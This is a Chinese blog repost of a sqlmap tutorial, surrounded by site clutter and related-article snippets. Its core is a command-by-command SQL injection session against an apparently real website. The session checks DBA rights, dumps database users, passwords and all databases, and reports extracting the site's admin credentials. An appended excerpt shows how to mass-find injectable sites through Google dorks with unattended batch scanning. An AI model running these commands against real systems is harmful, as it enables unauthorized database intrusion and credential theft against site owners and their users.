SQLMAP使用

最新推荐文章于 2021-04-29 18:06:06 发布
最新推荐文章于 2021-04-29 18:06:06 发布
阅读量109 收藏
点赞数
原文链接:http://www.cnblogs.com/aventador/p/3285953.html
版权

 

1.sqlmap -u http://www.1234.net/product.asp?sid=53   获取基本信息,对注入点进行初步的判断和检测

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

已经判断出目标的系统和数据库类型。

2.sqlmap -u http://www.1234.net/product.asp?sid=53  --is-dba -v 1 判断数据库使用者是否DBA。

可以看出是DBA。

3. sqlmap -u http://www.1234.net/product.asp?sid=53  --users -v 0 列举数据库用户(是否SA)。

   sqlmap -u http://www.1234.net/product.asp?sid=53  --passwords -v 0 获取数据库密码。

   sqlmap -u http://www.1234.net/product.asp?sid=53  --privileges -v 0 判断当前权限。

   sqlmap -u http://www.1234.net/product.asp?sid=53  --dbs -v 0       列出所有数据库。

   sqlmap -u http://www.1234.net/product.asp?sid=53  --dump-all  -v 0 导出所有库。

kali上的sqlmap出错了,换BT5继续

4. ./sqlmap.py -u  http://www.1234.net/product.asp?sid=53 --tables (--current-db) 获取当前数据库

中的表(-D 指定数据库)

得到4个表。

5../sqlmap.py -u  http://www.1234.net/product.asp?sid=53 --columns -T admin -v 2  获取指定数据库(-D 指定数据库)

中指定表的字段

6.python sqlmap.py -u  http://www.1234.net/product.asp?sid=53 --dump -T admin -C"username,password"   

获取指定数据库名中指定表中指定字段的数据

成功得到admin密码。

____________________________________________________________________________________________________________

摘抄:

1.如何高效率使用 google 搜索注入点:

 sudo python sqlmap.py -g inurl:php?id=13 --smart --threads=10 --batch 

稍作解释:
--smart 规定只是粗略判断是否可注入,而不详细检测(否则会慢死)
--batch 规定不与用户进行任何交互(这样你就可以一边看片片一边跑注入)
PS:说实话,sqlmap 用 google 搜注入点的功能真的不如啊 D,明小子

2.如何用 sqlmap 实现爬行页面搜索注入点
sudo sqlmap.py -u "www.xxx.com/view.php?id=13" --crawl=3
--crawl 指定爬行深度
3.模拟智能手机
sudo sqlmap.py -u "www.xxx.com/view.php?id=13" --mobile
4.盲注时智能预测表名字段名
sudo sqlmap.py -u "www.xxx.com/view.php?id=13" --predict-output

 

 

 

 

转载于:https://www.cnblogs.com/aventador/p/3285953.html

weixin_34380781
关注
史上最详细的sqlmap使用教程
大河之犬的博客
09-19 5万+
sqlmapsqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等Sqlmap采用了以下5种独特的SQL注入技术基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入。
sqlmap使用教程
热门推荐
hmysn的博客
07-27 1万+
sqlmap是一个自动化的SQL注入工具,主要功能是扫描、发现,并利用给定url的SQL注入漏洞。
linux进程suspended状态,为什么在一个终端上却显示“ Suspended(tty output)”(挂起(tty输出))?...
weixin_39768645的博客
04-29 2758
显然,我在tcshshell中做了一些奇怪/错误的事情,现在每当我在后台启动一个应用程序并打印输出到标准输出时,该应用程序就会被挂起(停止)。奇怪的是,此行为仅在此终端中发生;如果我在另一个终端上执行相同的操作,则该应用程序将继续在后台运行,并将其输出打印到终端。在“中断”终端中,我必须将挂起的应用程序放回前台(使用fg),以使其继续运行。例:thehost:/tmp/test1(277)>...
sqlmap使用
东方
09-11 101
https://blog.csdn.net/weixin_43571641/article/details/84146444
sql注入学习(包括sqlilabs安装搭建注入环境步骤以及sqlmap安装操作说明链接地址)
莉莉安的博客
02-04 1万+
SQL注入: 就是把SQL命令插入到Web表单然后提交到所在页面请求(查询字符串),从而达到欺骗服务器执行恶意的SQL命令。 它是利用现在已有的应用程序,将SQL语句插入到数据库中执行,执行一些并非按照设计者意图的SQL语句。 SQL注入可以分为平台层注入和代码注入。前者是由不安全的数据库配置或平台漏洞所致。后者是程序员对输入未进行细致过滤产生 sqlilabs搭建注入环境: Sqli-labs是...
Sqlmap基础命令介绍及常用命令
_Ralph的博客
01-16 1万+
POST登录框注入: sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data "指定参数" 绕过waf防火墙:sqlmap.py -u 注入点 -v 3 --dbs --batch --tamper space2morehas
sqlmap检测SQL注入及解决方案(Django)--超详细
pygodnet的博客
01-07 1082
一:场景、演示 场景:查询等拼接SQL和参数的问题,博主为了检测,这里写一个有注入风险的接口,请勿模仿 class PostMan(View): def get(self, request): aa = request.GET.get('aa') with connections['default'].cursor() as cursor: sql = 'select * from sys_dict where pid = %s'%(aa)
SQLMAP使用笔记.pdf
01-25
SQLMAP 使用笔记 SQLMAP 是一个开源的渗透测试工具,用于检测和利用 SQL 注入漏洞。下面是 SQLMAP使用笔记,包括常用参数、选项和示例。 一、SQLMAP 的基本使用 SQLMAP 的基本语法为:`sqlmap -u <url> ...
Sqlmap使用手册中文版
01-13
学习使用Sqlmap,除了阅读其官方文档和用户手册,还可以配合像sqli-labs这样的实验系统进行实践。用户手册详尽地介绍了Sqlmap的所有选项和开关,提供了丰富的实例,帮助用户理解和掌握如何有效使用这个工具。 当...
Sqlmap使用
weixin_34327223的博客
04-11 240
一、Sqlmap简介    sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞并接管数据库服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。 1.2 支持的数据库:    MySQL Oracle PostgreSQL Microsoft SQL Server, Microsoft ...
ASP.NET防止SqlMap注入示例
sinat_21813453的博客
11-23 1329
第一步:在Web.config中配置 &lt;appSettings&gt;     &lt;add key="safeParameters" value="OrderID-int32,CustomerEmail-email,ShippingZipcode-USzip" /&gt; &lt;/appSettings&gt;  第二步:在Global.asaxz中添加 protected vo...
sqlmap注入总结
weixin_34321753的博客
08-22 1458
本实验是基于DVWA和sqli-labs的实验环境实验平台搭建:下载Wamp集成环境,并下载DVWA和sqli-labs和压缩包解压至wamp\www的目录下。安装只要注意Wamp环境的数据库名和密码对应即可。sqlmap里涉及到的sql注入原理,请参考http://wt7315.blog.51cto.com/10319657/1828167,实验环境也是基于sqli-lab...
Sqlmap通用参数
一米八多的瑞兹的博客
02-25 551
Sqlmap通用参数 1. Sqlmap设置盲注字符集 在基于布尔和基于时间的SQL盲注中,用户可以强制使用自定义字符集来加速数据检索过程。 例如,如果转储消息摘要值(例如SHA1),则使用–charset=“0123456789abcdef”,预期请求数量比正常运行少30%左右。 2. Sqlmap爬取URL sqlmap可以通过从目标位置开始收集链接(爬行)来收集潜在的脆弱链接。使用此选项,用户可以设置一个深度(到起始位置的距离),低于这个深度,sqlmap不会进入收集阶段,因为只要有新的链接要访问,
sqlmap的简单使用
weixin_42350229的博客
01-25 160
文章目录sqlmap安装linux下win三种注入判断方式基本get注入及返回目标基本信息cookie注入post注入 sqlmap sqlmap强大的注入工具, 跨平台, 使用python编写, 可以自定义tamper脚本 安装 linux下 sudo apt-get install sqlmap # 前提是已经有python的环境变量 运行sqlmap sqlmap -u url # 直接s...
基于SpringBoot仿天猫购物系统.zip(毕设&课设&实训&大作业&竞赛&项目)
09-20
项目工程资源经过严格测试可直接运行成功且功能正常的情况才上传,可轻松复刻,拿到资料包后可轻松复现出一样的项目,本人系统开发经验充足(全领域),有任何使用问题欢迎随时与我联系,我会及时为您解惑,提供帮助。 【资源内容】:包含完整源码+工程文件+说明(如有)等。答辩评审平均分达到96分,放心下载使用!可轻松复现,设计报告也可借鉴此项目,该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的。 【提供帮助】:有任何使用问题欢迎随时与我联系,我会及时解答解惑,提供帮助 【附带帮助】:若还需要相关开发工具、学习资料等,我会提供帮助,提供资料,鼓励学习进步 【项目价值】:可用在相关项目设计中,皆可应用在项目、毕业设计、课程设计、期末/期中/大作业、工程实训、大创等学科竞赛比赛、初期项目立项、学习/练手等方面,可借鉴此优质项目实现复刻,设计报告也可借鉴此项目,也可基于此项目来扩展开发出更多功能 下载后请首先打开README文件(如有),项目工程可直接复现复刻,如果基础还行,也可在此程序基础上进行修改,以实现其它功能。供开源学习/技术交流/学习参考,勿用于商业用途。质量优质,放心下载使用
Python网络爬虫与推荐算法新闻推荐平台(毕设&课设&实训&大作业&竞赛&项目)
最新发布
09-20
Python网络爬虫与推荐算法新闻推荐平台:网络爬虫:通过Python实现新浪新闻的爬取,可爬取新闻页面上的标题、文本、图片、视频链接(保留排版) 推荐算法:权重衰减+标签推荐+区域推荐+热点推荐.zip项目工程资源经过严格测试可直接运行成功且功能正常的情况才上传,可轻松复刻,拿到资料包后可轻松复现出一样的项目,本人系统开发经验充足(全领域),有任何使用问题欢迎随时与我联系,我会及时为您解惑,提供帮助。 【资源内容】:包含完整源码+工程文件+说明(如有)等。答辩评审平均分达到96分,放心下载使用!可轻松复现,设计报告也可借鉴此项目,该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的。 【提供帮助】:有任何使用问题欢迎随时与我联系,我会及时解答解惑,提供帮助 【附带帮助】:若还需要相关开发工具、学习资料等,我会提供帮助,提供资料,鼓励学习进步 【项目价值】:可用在相关项目设计中,皆可应用在项目、毕业设计、课程设计、期末/期中/大作业、工程实训、大创等学科竞赛比赛、初期项目立项、学习/练手等方面,可借鉴此优质项目实现复刻,设计报告也可借鉴此项目,也可基于此项目来扩展开发出更多功能 下载后请首先打开README文件(如有),项目工程可直接复现复刻,如果基础还行,也可在此程序基础上进行修改,以实现其它功能。供开源学习/技术交流/学习参考,勿用于商业用途。质量优质,放心下载使用
THUCNews数据集
09-20
THUCNews数据集
Q音:Vue3+Pinia+Vue Router4+Vant4的移动端仿抖音短视频项目.zip(毕设&课设&实训&大作业&竞赛&
09-20
项目工程资源经过严格测试可直接运行成功且功能正常的情况才上传,可轻松复刻,拿到资料包后可轻松复现出一样的项目,本人系统开发经验充足(全领域),有任何使用问题欢迎随时与我联系,我会及时为您解惑,提供帮助。 【资源内容】:包含完整源码+工程文件+说明(如有)等。答辩评审平均分达到96分,放心下载使用!可轻松复现,设计报告也可借鉴此项目,该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的。 【提供帮助】:有任何使用问题欢迎随时与我联系,我会及时解答解惑,提供帮助 【附带帮助】:若还需要相关开发工具、学习资料等,我会提供帮助,提供资料,鼓励学习进步 【项目价值】:可用在相关项目设计中,皆可应用在项目、毕业设计、课程设计、期末/期中/大作业、工程实训、大创等学科竞赛比赛、初期项目立项、学习/练手等方面,可借鉴此优质项目实现复刻,设计报告也可借鉴此项目,也可基于此项目来扩展开发出更多功能 下载后请首先打开README文件(如有),项目工程可直接复现复刻,如果基础还行,也可在此程序基础上进行修改,以实现其它功能。供开源学习/技术交流/学习参考,勿用于商业用途。质量优质,放心下载使用
sqlmap 使用指令
09-22
下面是一些常用的 sqlmap 使用指令: 1. 扫描目标网站是否存在 SQL 注入漏洞: `python sqlmap.py -u <URL>` 例如:`python sqlmap.py -u http://www.example.com/index.php?id=1` 2. 检测目标网站是否存在 SQL...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值